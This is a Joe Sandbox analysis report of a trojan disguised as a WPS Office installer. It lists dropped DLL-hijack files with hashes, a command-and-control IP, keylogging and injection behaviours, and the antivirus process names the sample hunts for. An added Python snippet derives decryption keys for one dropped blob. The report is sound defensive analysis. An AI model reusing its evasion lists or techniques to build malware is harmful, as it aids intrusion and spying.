Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe Code function: 3_2_0332DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,3_2_0332DF10
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe Code function: 3_2_03335D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_03335D22
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe Code function: 3_2_03326A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,3_2_03326A70
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: ShellExperienceHosts.exe Binary or memory string: acs.exe
Source: ShellExperienceHosts.exe Binary or memory string: vsserv.exe
Source: ShellExperienceHosts.exe Binary or memory string: kxetray.exe
Source: ShellExperienceHosts.exe Binary or memory string: avcenter.exe
Source: ShellExperienceHosts.exe Binary or memory string: KSafeTray.exe
Source: ShellExperienceHosts.exe Binary or memory string: cfp.exe
Source: ShellExperienceHosts.exe Binary or memory string: avp.exe
Source: ShellExperienceHosts.exe Binary or memory string: 360Safe.exe
Source: ShellExperienceHosts.exe Binary or memory string: rtvscan.exe
Source: ShellExperienceHosts.exe Binary or memory string: 360tray.exe
Source: ShellExperienceHosts.exe Binary or memory string: ashDisp.exe
Source: ShellExperienceHosts.exe Binary or memory string: TMBMSRV.exe
Source: ShellExperienceHosts.exe Binary or memory string: 360Tray.exe
Source: ShellExperienceHosts.exe Binary or memory string: avgwdsvc.exe
Source: ShellExperienceHosts.exe Binary or memory string: AYAgent.aye
Source: ShellExperienceHosts.exe Binary or memory string: QUHLPSVC.EXE
Source: ShellExperienceHosts.exe Binary or memory string: RavMonD.exe
Source: ShellExperienceHosts.exe Binary or memory string: Mcshield.exe
Source: ShellExperienceHosts.exe Binary or memory string: K7TSecurity.exe
MITRE ATT&CK Matrix (one row per line; the number in parentheses is the per-technique count given in the report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (1) | Replication Through Removable Media (1) | Windows Management Instrumentation (1) | Scripting (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | Input Capture (141) | System Time Discovery (2) | Remote Services | Archive Collected Data (12) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Data Encrypted for Impact (1)
Credentials | Domains | Default Accounts | Native API (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Peripheral Device Discovery (11) | Remote Desktop Protocol | Screen Capture (1) | Encrypted Channel (2) | Exfiltration Over Bluetooth | System Shutdown/Reboot (1)
Email Addresses | DNS Server | Domain Accounts | PowerShell (1) | Logon Script (Windows) | Process Injection (222) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Input Capture (141) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Software Packing (12) | NTDS | System Information Discovery (28) | Distributed Component Object Model | Clipboard Data (2) | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (141) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (31) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Modify Registry (1) | DCSync | Process Discovery (4) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (31) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (222) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Indicator Removal (1) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph
Behavior Graph ID: 1581258
Sample: S1Rv3ioghk.exe
Startdate: 27/12/2024
Architecture: WINDOWS
Score: 100
Top-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 5 other signatures

Process tree:
S1Rv3ioghk.exe (started)
    dropped: C:\Users\...\wps_lid.lid-s8HDMqE8a6Xy.exe (PE32); C:\Users\Public\Bulete\program\yyzyBase.dll (PE32); C:\Users\Public\...\ShellExperienceHosts.exe (PE32)
    -> cmd.exe (started)
        signature: Bypasses PowerShell execution policy
        -> ShellExperienceHosts.exe (started)
            network: 118.107.44.112, 18091, 18852, 49771, BCPL-SGBGPNETGlobalASNSG Singapore
            dropped: C:\Users\user\AppData\Local\Temp\backup.exe (PE32); C:\Users\user\AppData\Local\Temp\backup.dll (PE32); C:\Users\user\AppData\Local\updated.ps1 (ASCII)
            signatures: Detected unpacking (creates a PE file in dynamic memory); Contains functionality to inject threads in other processes; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes
            -> cmd.exe (started) -> powershell.exe, conhost.exe
            -> cmd.exe (started) -> powershell.exe (signature: Loading BitLocker PowerShell Module), conhost.exe
            -> cmd.exe (started) -> conhost.exe, tasklist.exe, tasklist.exe, 10 other processes
        -> conhost.exe (started)

Submitted file:
Source | Detection | Scanner | Label
S1Rv3ioghk.exe | 67% | Virustotal |
S1Rv3ioghk.exe | 66% | ReversingLabs | Win32.Trojan.DllHijack

Dropped files:
Source | Detection | Scanner | Label
C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | 0% | ReversingLabs |
C:\Users\Public\Bulete\program\yyzyBase.dll | 83% | ReversingLabs | Win32.Trojan.DllHijack
C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\backup.dll | 83% | ReversingLabs | Win32.Trojan.DllHijack
C:\Users\user\AppData\Local\Temp\backup.exe | 0% | ReversingLabs |
No Antivirus matches
URLs:
Source | Detection | Scanner | Label
http://dw-collect-debug.ksord.com)datesign_eventslocal | 0% | Avira URL Cloud | safe
https://http_.index.inicert_detailis_cached_fileverify_cert_failedKOnlineSetupImpl::__generateCacheF | 0% | Avira URL Cloud | safe
http://crl.mi# | 0% | Avira URL Cloud | safe
http://crl.micro#: | 0% | Avira URL Cloud | safe
https://event.wps.comdynamicParamFinishTagt1_app_start_p_st_sv_app_gid_did_hdid3_aid_ut_rid_av_ch_db | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0# | 0% | Avira URL Cloud | safe
https://s.wps.comshortLinkUrlshortlink/short-link/queryshort_link_code=geterr_signAuthorizationdevic | 0% | Avira URL Cloud | safe
http://crl.microf? | 0% | Avira URL Cloud | safe
No contacted domains info
URLs found in memory and binaries
URL | Source | Malicious | Antivirus detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.wps.com/eula | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
https://sectigo.com/CPS0 | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | - | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | - | high
http://ocsp.sectigo.com0 | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/http-cookies.html | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000010.00000002.2528737566.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2528737566.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.micro#: | powershell.exe, 00000011.00000002.2548437777.0000000006F32000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://event.wps.comdynamicParamFinishTagt1_app_start_p_st_sv_app_gid_did_hdid3_aid_ut_rid_av_ch_db | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://crl.mi# | powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | - | high
https://params.wps.com/api/map/online_params/webparam_mig/onlineParamByFunc?funcName=&version=&chann | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
http://dw-collect-debug.ksord.com)datesign_eventslocal | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://http_.index.inicert_detailis_cached_fileverify_cert_failedKOnlineSetupImpl::__generateCacheF | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://s.wps.comshortLinkUrlshortlink/short-link/queryshort_link_code=geterr_signAuthorizationdevic | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://www.wps.com/privacy-policy | wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | - | high
https://curl.se/docs/alt-svc.html | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://ocsp.sectigo.com0# | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | Avira URL Cloud: safe | unknown
https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/onlinesetup/package/SOFTWARE | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
https://curl.se/docs/hsts.html | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | - | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | - | high
https://aka.ms/pscore6lB | powershell.exe, 00000010.00000002.2528737566.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004701000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.dr | false | - | high
http://dw-online.ksosoft.com/api/dynamicParam/v3/app/2.9.0dcsdk_eventv3.dbdcsdk_dpv3.data10C | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000010.00000002.2528737566.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2528737566.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.microf? | powershell.exe, 00000011.00000002.2549179185.0000000006FAB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ic.wps.cn/wpsv6internet/infos.ads?v=D1S1E1&d=kdcsdk_infoc/wps/client/appcountrycodelastupdate | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000010.00000002.2528737566.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004701000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://en.ksupdate.com/errorreport/uphttps://en.ksupdate.com/errorreport/up-crashdmp | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
https://www.wps.com/eulaprivacy_policylicense_agreementlabelTitleMsg_Wps_OnlineSetup_TaskMsgMsg_Wps_ | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
https://params.wps.com/api/map/online_params/webparam_mig/onlineParamByFunc?funcName= | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
https://website-prod.cache.wpscdn.com/pkgs/win/setup_XA_mui_Free.exeSOFTWARE | S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | false | - | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
118.107.44.112 | unknown | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581258
Start date and time: 2024-12-27 09:18:34 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: S1Rv3ioghk.exe (renamed because the original name is a hash value)
Original Sample Name: FD7EC2C34E2593E4D606E0A9D37E257A.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@43/28@0/1
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 117
• Number of non-executed functions: 230
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Excluded processes (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target S1Rv3ioghk.exe, PID 6364 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 6104 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                                                      No simulations
                                                                      No context
                                                                      No context
ASN context: other samples seen contacting BCPL-SGBGPNETGlobalASNSG
Associated sample / URL | Detection | Threat name | Context IP
WiezmDFd6L.exe | malicious | Unknown | 134.122.155.90
armv7l.elf | malicious | Unknown | 134.122.132.194
492c3445eddadc4b2c411a6eb79813339a0b3fc6d2d69.dll | malicious | Unknown | 134.122.134.93
rQuotation.exe | malicious | FormBook | 202.95.11.110
3.elf | malicious | Unknown | 137.220.247.57
MicrosoftEdgeUpdateSetup.exe | malicious | Unknown | 134.122.134.93
SWIFT COPY.exe | malicious | FormBook | 134.122.191.187
http://93287.mobi | malicious | Unknown | 137.220.229.108
T2dvU8f2xg.exe | malicious | Unknown | 118.107.29.172
oiBxz37xUo.dll | malicious | Unknown | 118.107.29.172
                                                                      No context
Dropped file context: other samples that dropped the same file
Match | Associated sample | Detection | Threat name
C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | TEKujpTgCK.exe | malicious | Unknown
C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | TEKujpTgCK.exe | malicious | Unknown
Process: C:\Users\user\Desktop\S1Rv3ioghk.exe
File Type: openssl enc'd data with salted password, base64 encoded
Category: dropped
Size (bytes): 64
Entropy (8bit): 5.234069531114784
Encrypted: false
SSDEEP: 3:iqkHHQwRS2k0OGad+FLin:ilnQwRSDnWLi
MD5: E2FA2D0BD626C372F9EFA15C317F46B1
SHA1: 1CAA48FE6CA1483AE9A725E76D0D818051A72371
SHA-256: 39C5EC16491E480806D170BD2A8BC2C37623E55412088ED11F21DE7D9146CA73
SHA-512: 115A02EE1C1EF7A8CF2854969343813928C187DF0BB9CD1DE832236EDCBE675749C9B17C0F15E545712857FEE7B637473858076F071C94888687C381570572F1
Malicious: false
Preview: U2FsdGVkX19SSgxWGselBWOCnDAwAjUSAJ8Fo8HIt6cUaOMqZptM4GJaCI/aSrXz
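The 64-byte drop above is exactly what `openssl enc -a` (base64 output, salted, which is the default) writes: an 8-byte "Salted__" magic, an 8-byte random salt, then the ciphertext. That is all a file-type signature needs, and it is also all an analyst can recover without the password, which is not on this page. The block below is an added example, not Joe Sandbox output: it decodes the report's own preview, splits out the salt, and shows the two key-derivation routines `openssl enc` uses so that a recovered password can be turned into an AES key and IV. The password "changeme" is a placeholder.

```python
"""Parse the 64-byte "openssl enc'd data with salted password, base64 encoded"
drop above and derive the key material needed to try a password against it.

Added example, not Joe Sandbox output. The blob is the report's own preview;
the password "changeme" is a placeholder, the real one is not on the page."""
import base64
import hashlib

BLOB_B64 = "U2FsdGVkX19SSgxWGselBWOCnDAwAjUSAJ8Fo8HIt6cUaOMqZptM4GJaCI/aSrXz"
MAGIC = b"Salted__"            # 8-byte header written by `openssl enc -salt` (the default)


def parse_openssl_salted(b64_text):
    """Split an OpenSSL 'Salted__' container into salt and ciphertext."""
    raw = base64.b64decode(b64_text, validate=True)
    if len(raw) < 16 or not raw.startswith(MAGIC):
        raise ValueError("not an OpenSSL Salted__ container")
    body = raw[16:]
    return {
        "salt": raw[8:16],
        "ciphertext": body,
        # a CBC block cipher (aes-256-cbc is the common choice) leaves a 16-byte multiple
        "block_aligned": len(body) % 16 == 0,
    }


def evp_bytes_to_key(password, salt, digest="md5", key_len=32, iv_len=16):
    """Legacy OpenSSL KDF (EVP_BytesToKey, one iteration): what `openssl enc`
    uses unless -pbkdf2 is given. OpenSSL 1.0.x defaults the digest to MD5,
    1.1.0 and later to SHA-256, so try both. Returns (key, iv)."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        prev = hashlib.new(digest, prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]


def pbkdf2_key_iv(password, salt, iterations=10000, key_len=32, iv_len=16):
    """KDF used by `openssl enc -pbkdf2` (PBKDF2-HMAC-SHA256, 10000 rounds by
    default); key and IV come out of a single derivation. Returns (key, iv)."""
    km = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, key_len + iv_len)
    return km[:key_len], km[key_len:]


if __name__ == "__main__":
    info = parse_openssl_salted(BLOB_B64)
    print("salt:", info["salt"].hex(), "ciphertext bytes:", len(info["ciphertext"]))
    candidates = (
        ("EVP_BytesToKey/md5", lambda p, s: evp_bytes_to_key(p, s, "md5")),
        ("EVP_BytesToKey/sha256", lambda p, s: evp_bytes_to_key(p, s, "sha256")),
        ("PBKDF2-HMAC-SHA256", pbkdf2_key_iv),
    )
    for name, kdf in candidates:
        key, iv = kdf(b"changeme", info["salt"])    # placeholder password
        print(f"{name}: key={key.hex()} iv={iv.hex()}")
```

With 32 bytes of ciphertext the plaintext is between 17 and 32 bytes, so this drop is a short string, not a payload. To test a password, feed each (key, iv) pair into AES-256-CBC (the `cryptography` package, which is not in the standard library) and treat a PKCS#7 padding failure as a wrong guess; since the page does not name the cipher, the three derivations above cover the default `openssl enc` behaviours rather than a known one.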
Process: C:\Users\user\Desktop\S1Rv3ioghk.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 649416
Entropy (8bit): 6.182028963232553
Encrypted: false
SSDEEP: 12288:zohLz8nnnnntnnnnnnnnnnnnnnnxnMvnnnnPZnnnnPxnnnnnnnnqshJSLnk41mCL:zshQmC5Bz5CLgBFqGI1yi/UQeZndsqro
MD5: 0922B22053A6D5D9516EA910D34A4771
SHA1: 784D3ED35D040091AE209792E2FA8FC97EE6A071
SHA-256: 41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA
SHA-512: 909EC8B2C1045CC11C03C6B82B7ED6AD96BC8E93F9C98CB8A668572C84CBBCE778C12365B2B2EB547218783A830BE41458E0AE21939E99339F54921D98D944D8
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: TEKujpTgCK.exe, Detection: malicious
• Filename: TEKujpTgCK.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....U..U..U]..T..U]..T..U]..T..U]..T..U...T#.U...T..U...T..U...T..U..UW.U...T..U...T..U..[U..U...T..URich..U........................PE..L......d..........".......... ....../.............@.......................... ..................................................(....@...................\..............T........................... ...@............................................tp6............b.................. ..`.tp6.a..nZ.......\...f..............@..@.tp6......... ......................@..@.tp6.........@......................@..@.tp6d...5%.......&...f.............. ...................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\S1Rv3ioghk.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3900728
Entropy (8bit): 6.921777359365007
Encrypted: false
SSDEEP: 98304:j9G9uqf+tQ+5ObxeayQwz10kfVtOpDLYAznM71B99gnImkJ:j9qfyixeVtqktjAznM7X9+ImkJ
MD5: E6B35BB2692E704C72FAD83DE5C86E67
SHA1: B8335960E3A92ED8C436B46FCF9D1518902D8A1B
SHA-256: 48756A865554BFBBEAF25A0DDB3B16AF44F113327BA5C01A506E37F3F584D64D
SHA-512: B7B1F0528AE5DEE82C4A057A9D99F716AB24A05A2D832CD15BE3CFC738CA97FF0A31DEC3877A32F189C9554364F7B024AB27BED0B4B94DE6B9F4D7DD9FBF03D4
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 83%
Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...B.Qg...........!.....^...r...............................................`;.......;...@.........................H ".L.... ".......$..L............:.8.....8............................... ......M ............. -"..............................text...8\.......^.................. ..`.rdata...'...p...(...b..............@..@.data.........#..p....#.............@....00cfg.......`$.......#.............@..@.tls.........p$.......#.............@....rsrc....L....$..N....#.............@..@.reloc........8......L8.............@..B................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\S1Rv3ioghk.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5910912
Entropy (8bit): 6.969603243680094
Encrypted: false
SSDEEP: 98304:O6pg+4qaSDRumxkEpMH1FkQmOnhTjqsaUODS4IeOsyrwuv/guB/k:V5IS1FnpAvHZwiO2AOsezgyk
MD5: 5C8ABA9389C18C86BDD8014A0236D165
SHA1: C01D208B37F913BF0D49306A715234C8C26CCB95
SHA-256: 5BDEB32D9035F87180E12AF1FB48E8DC1D921125265840A43DA067EDA31645EF
SHA-512: 217881B7DF89865139D9A74584EA1B28AA952C478D5CFDA20D5744C34579EFD2C2DEB4E534AFE32EAAAC9B998D956D5B7B8CA72305F9FB78D03D7C46FCD515D0
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......#..Yg..g..g..<...~..<......<...f....q.j..5...t..5...}..<...f..5......<...x..<...d..g..r.........g..............s.f..g...e......f..Richg..........PE..L....(2g.................V>..........V'......p>...@...........................Z.......Z...@...................................K.(.....L..S............Y..Q....W.H....6I.8...................@6I.....h|F.@............p>.`.....J.@....................text....T>......V>................. ..`.rdata.......p>......Z>.............@..@.data...TR...0K.......K.............@....rsrc....S....L..T....K.............@..@.reloc..H.....W......HW.............@..B................................................................................................................................................................................................................................................................

